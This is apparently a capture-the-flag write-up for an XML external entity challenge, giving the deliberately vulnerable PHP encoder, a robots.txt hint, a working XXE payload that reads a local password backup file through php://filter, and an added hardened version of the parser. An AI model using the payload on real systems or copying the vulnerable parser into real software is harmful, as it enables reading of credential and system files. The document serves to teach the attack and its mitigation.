xml
===

[toc]

## source

### index.php

```php=
<?php
error_reporting(0);
// highlight_file(__FILE__);
// Deliberately vulnerable: the external entity loader is left enabled.
libxml_disable_entity_loader (false);
$xmlfile = $_POST["data"];
if ($_POST != []){
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities, LIBXML_DTDLOAD loads the DTD.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    // echo $creds;
    if ($creds->encode == "true"){
        echo "<textarea rows=\"10\" cols=\"50\">".base64_encode($creds->data)."</textarea>";
    }
    else {
        echo "<textarea rows=\"10\" cols=\"50\">".base64_decode($creds->data)."</textarea>";
    }
}
?>
<html>
<h1>encode</h1>
<form action="/" method="POST">
    <textarea rows="5" cols="50" name="data"><?xml version="1.0" encoding="utf-8"?><base64><encode>true</encode><data>123456</data></base64></textarea>
    <input type="submit" value="encode it!">
</form>
<h1>decode</h1>
<form action="/" method="POST">
    <textarea rows="5" cols="50" name="data"><?xml version="1.0" encoding="utf-8"?><base64><encode>false</encode><data>MTIzNDU2</data></base64></textarea>
    <input type="submit" value="decode it!">
</form>
</html>
```

### robots.txt

```txt=
# robots.txt for xml_atk
# remember backup is here {{{{C:\\backup\pa55word_backup.QAQ.txt}}}
User-Agent: *
Disallow: /*/
```

## payload

```xml=
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/backup/pa55word_backup.QAQ.txt"> ]>
<base64>
    <encode>false</encode>
    <data>&goodies;</data>
</base64>
```

## refer

https://xz.aliyun.com/t/3357

https://github.com/payloadbox/xxe-injection-payload-list
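
## mitigation

Added example, not part of the original write-up or the challenge's code: the same encode/decode handler from index.php with the XML parsing hardened so that the external entity in the payload is never resolved. The function names `parse_request_xml` and `handle` are hypothetical, and the two sample inputs at the end are constructed.

```php
<?php
// Added example, not the challenge's code; function names are hypothetical.
function parse_request_xml(string $xml): ?SimpleXMLElement
{
    // Empty input makes loadXML() throw on PHP 8; a DOCTYPE is never needed here.
    if ($xml === '' || stripos($xml, '<!DOCTYPE') !== false) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        // Before PHP 8.0 the entity loader has to be switched off explicitly.
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // No LIBXML_NOENT and no LIBXML_DTDLOAD; LIBXML_NONET forbids network fetches.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return null;
    }
    // Defence in depth: the string check can miss a DOCTYPE in another encoding.
    foreach ($dom->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            return null;
        }
    }
    $sx = simplexml_import_dom($dom);
    return $sx instanceof SimpleXMLElement ? $sx : null;
}

function handle(string $xml): string
{
    $creds = parse_request_xml($xml);
    if ($creds === null) {
        return 'invalid input';
    }
    $data = (string) $creds->data;
    $out = ((string) $creds->encode === 'true')
        ? base64_encode($data)
        : (string) base64_decode($data, true);
    // Escape before echoing into the <textarea>; the original prints raw output.
    return htmlspecialchars($out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: a plain request and one that declares a DTD.
$plain = '<?xml version="1.0" encoding="utf-8"?><base64><encode>true</encode><data>123456</data></base64>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE base64 [<!ENTITY e "x">]><base64><encode>true</encode><data>&e;</data></base64>';
echo handle($plain), "\n", handle($withDtd), "\n";
```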